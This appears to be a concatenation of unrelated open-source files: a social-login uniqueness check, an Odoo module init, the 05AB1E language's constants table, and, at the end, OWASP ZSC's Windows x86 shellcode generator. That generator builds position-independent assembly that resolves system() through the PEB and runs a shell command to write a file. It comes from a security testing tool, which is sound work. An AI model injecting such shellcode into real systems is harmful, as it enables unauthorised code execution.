uid) if test_unique_provider is not None: return False else: return True @classmethod def check_unique_user(cls, provider, user): # pair (user, provider) should be unique test_unique_user = cls.get_by_user_and_provider(user, provider) if test_unique_user is not None: return False else: return True @classmethod def check_unique(cls, user, provider, uid): # pair (provider, uid) should be unique and pair (user, provider) should be unique return cls.check_unique_uid(provider, uid) and cls.check_unique_user(provider, user) @staticmethod def open_id_providers(): return [k for k,v in SocialUser.PROVIDERS_INFO.items() if v['uri']]
sysadminmatmoz/odoo-clearcorp
TODO-8.0/cash_flow_report/__init__.py
Python
agpl-3.0
1,165
0.000858
# -*- coding: utf-8 -*- ############################
################################################## # # OpenERP, Open Source Management Solution # Addons modules by CLEARCORP S.A. # Copyright (C) 2009-TODAY CLEARCORP S.A. (<http://clearcorp.co.cr>). # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. #
# This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## import account_move_line import account_move_reconcile import cash_flow_type import cash_flow_distribution import report import wizard
Emigna/05AB1E
lib/constants.py
Python
mit
146,313
0.000055
import datetime import math class MethodAttribute: """ A method attribute is an attribute with the method and its corresponding arity attached as parameters. It simply acts as a tuple for easy access """ def __init__(self, method, arity): self.method = method self.arity = arity constants = { "ža": MethodAttribute( lambda: int(datetime.datetime.now().hour), arity=0 ), "žb": MethodAttribute( lambda: int(datetime.datetime.now().minute), arity=0 ), "žc": MethodAttribute( lambda: int(datetime.datetime.now().second), arity=0 ), "žd": MethodAttribute( lambda: int(datetime.datetime.now().microsecond), arity=0 ), "že": MethodAttribute( lambda: int(datetime.datetime.now().day), arity=0 ), "žf": MethodAttribute( lambda: int(datetime.datetime.now().month), arity=0 ), "žg": MethodAttribute( lambda: int(datetime.datetime.now().year), arity=0 ), "žh": MethodAttribute( lambda: "0123456789", arity=0 ), "ži": MethodAttribute( lambda: "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ", arity=0 ), "žj": MethodAttribute( lambda: "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_", arity=0 ), "žk": MethodAttribute( lambda: "zyxwvutsrqponmlkjihgfedcbaZYXWVUTSRQPONMLKJIHGFEDCBA", arity=0 ), "žl": MethodAttribute( lambda: "zyxwvutsrqponmlkjihgfedcbaZYXWVUTSRQPONMLKJIHGFEDCBA9876543210_", arity=0 ), "žm": MethodAttribute( lambda: "9876543210", arity=0 ), "žn": MethodAttribute( lambda: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz", arity=0 ), "žo": MethodAttribute( lambda: "ZYXWVUTSRQPONMLKJIHGFEDCBAzyxwvutsrqponmlkjihgfedcba", arity=0 ), "žp": MethodAttribute( lambda: "ZYXWVUTSRQPONMLKJIHGFEDCBA", arity=0 ), "žq": MethodAttribute( lambda: math.pi, arity=0 ), "žr": MethodAttribute( lambda: math.e, arity=0 ), "žs": MethodAttribute( lambda x: constant_pi[0:int(x) + 2], arity=1 ), "žt": MethodAttribute( lambda x: constant_e[0:int(x) + 2], arity=1 ), "žu": MethodAttribute( lambda: "()<>[]{}", arity=0 ), "žv": MethodAttribute( lambda: 16, arity=0 ), "žw": MethodAttribute( lambda: 32, arity=0 ), "žx": MethodAttribute( lambda: 64, arity=0 ), "žy": MethodAttribute( lambda: 128, arity=0 ), "žz": MethodAttribute( lambda: 256, arity=0 ), "žA": MethodAttribute( lambda: 512, arity=0 ), "žB": MethodAttribute( lambda: 1024, arity=0 ), "žC": MethodAttribute( lambda: 2048, arity=0 ), "žD": MethodAttribute( lambda: 4096, arity=0 ), "žE": MethodAttribute( lambda: 8192, arity=0 ), "žF": MethodAttribute( lambda: 16384, arity=0 ), "žG": MethodAttribute( lambda: 32768, arity=0 ), "žH": MethodAttribute( lambda: 65536, arity=0 ), "žI": MethodAttribute( lambda: 2147483648, arity=0 ), "žJ": MethodAttribute( lambda: 4294967296, arity=0 ), "žK": MethodAttribute( lambda: "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789", arity=0 ), "žL": MethodAttribute( lambda: "zyxwvutsrqponmlkjihgfedcb
aZYXWVUTSRQPONMLKJIHGFEDCBA9876543210", arity=0 ), "žM": MethodAttribute( lambda: "aeiou", arity=0
), "žN": MethodAttribute( lambda: "bcdfghjklmnpqrstvwxyz", arity=0 ), "žO": MethodAttribute( lambda: "aeiouy", arity=0 ), "žP": MethodAttribute( lambda: "bcdfghjklmnpqrstvwxz", arity=0 ), "žQ": MethodAttribute( lambda: " !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~", arity=0 ), "žR": MethodAttribute( lambda: "ABC", arity=0 ), "žS": MethodAttribute( lambda: "qwertyuiop", arity=0 ), "žT": MethodAttribute( lambda: "asdfghjkl", arity=0 ), "žU": MethodAttribute( lambda: "zxcvbnm", arity=0 ), "žV": MethodAttribute( lambda: ["qwertyuiop", "asdfghjkl", "zxcvbnm"], arity=0 ), "žW": MethodAttribute( lambda: "qwertyuiopasdfghjklzxcvbnm", arity=0 ), "žX": MethodAttribute( lambda: "qwertyuiopasdfghjklzxcvbnm", arity=0 ), "т": MethodAttribute( lambda: 100, arity=0 ), "₁": MethodAttribute( lambda: 256, arity=0 ), "₂": MethodAttribute( lambda: 26, arity=0 ), "₃": MethodAttribute( lambda: 95, arity=0 ), "₄": MethodAttribute( lambda: 1000, arity=0 ) } class ConstantsInvoker: def __init__(self): self.commands_list = constants def invoke_command(self, command, *args): """ Invokes the command passed through the argument and computes the desired result using the rest of the arguments as args for the method :param command: A string representation of the 05AB1E command :param args: The arguments that will be passed on the method :return: Any variable, determined by the corresponding method """ current_method = self.commands_list.get(command) result = current_method.method(*args) return result constant_pi = "3.141592653589793238462643383279502884197169399375105820974944"\ "92307816406286208998628034825342117067982148086513282306647093"\ "44609550582231725359408128481117450284102701938521105559644622"\ "48954930381964428810975665933446128475648233786783165271201909"\ "45648566923460348610454326648213393607260249141273724587006606"\ "15588174881520920962829254091715364367892590360011330530548820"\ "66521384146951941511609433057270365759591953092186117381932611"\ "93105118548074462379962749567351885752724891227938183011949129"\ "33673362440656643086021394946395224737190702179860943702770539"\ "17176293176752384674818467669405132000568127145263560827785771"\ "42757789609173637178721468440901224953430146549585371050792279"\ "89258923542019956112129021960864034418159813629774771309960518"\ "07211349999998372978049951059731732816096318595024459455346908"\ "02642522308253344685035261931188171010003137838752886587533208"\ "81420617177669147303598253490428755468731159562863882353787593"\ "51957781857780532171226806613001927876611195909216420198938095"\ "57201065485863278865936153381827968230301952035301852968995773"\ "22599413891249721775283479131515574857242454150695950829533116"\ "61727855889075098381754637464939319255060400927701671139009848"\ "24012858361603563707660104710181942955596198946767837449448255"\ "79774726847104047534646208046684259069491293313677028989152104"\ "52162056966024058038150193511253382430035587640247496473263914"\ "99272604269922796782354781636009341721641219924586315030286182"\ "74555706749838505494588586926995690927210797509302955321165344"\ "87202755960236480665499119881834797753566369807426542527862551"\ "18417574672890977772793800081647060016145249192173217214772350"\ "41441973568548161361157352552133475741849468438523323907394143"\ "34547762416862518983569485562099219222184272550254256887671790"\
Ali-Razmjoo/OWASP-ZSC
lib/generator/windows_x86/create_file.py
Python
gpl-3.0
1,892
0.000529
#!/usr/bin/env python ''' OWASP ZSC https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project https://github.com/zscproject/OWASP-ZSC http://api.z3r0d4y.com/ https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] ''' from core import stack def create_file(create_command): return ''' xor %ecx,%ecx mov %fs:0x30(%ecx),%eax mov 0xc(%eax),%eax mov 0x14(%eax),%esi lods %ds:(%esi),%eax xchg %eax,%esi lods %ds:(%esi),%eax mov 0x10(%eax),%ebx mov 0x3c(%ebx),%edx add %ebx,%edx mov 0x78(%edx),%edx add %ebx,%edx mov 0x20(%edx),%esi add %ebx,%esi xor %ecx,%ecx inc %ecx lods %ds:(%esi),%eax add %ebx,%eax cmpl $0x50746547,(%eax) jne 23 <.text+0x23> cmpl $0x41636f72,0x4(%eax) jne 23 <.text+0x23> cmpl $0x65726464,0x8(%eax) jne 23 <.text+0x23> mov 0x24(%edx),%esi add %ebx,%esi mov (%esi,%ecx,2),%cx dec %ecx mov 0x1c(%edx),%esi add %ebx,%esi mov (%esi,%ecx,4),%edx add %ebx,%edx xor %esi,%esi mov %edx,%esi xor %ecx,%ecx push %ecx push $0x41797261 push $0x7262694c push $0x64616f4c push %esp push %ebx call *%edx xor %ecx,%ecx mov $0
x6c6c,%cx push %ecx push $0x642e7472 push $0x6376736d push %esp call *%eax xor %edi,%edi mov %eax,%edi xor %edx,%edx push %edx mov $0x6d65,%dx push %edx push $0x74737973 mov %esp,%ecx push %ecx push %edi xor %edx,%edx mov %esi,%edx call *%edx xor %ecx,%ecx {0} push %esp call *%eax xor %edx,%edx push %edx push $0x74697865 mov %esp,%ecx push %ecx push %edi call *%
esi xor %ecx,%ecx push %ecx call *%eax '''.format(create_command) def run(data): file_to_create = data[0] file_content = data[1] return create_file(stack.generate("echo " + file_content + ">" + file_to_create, "%ecx", "string"))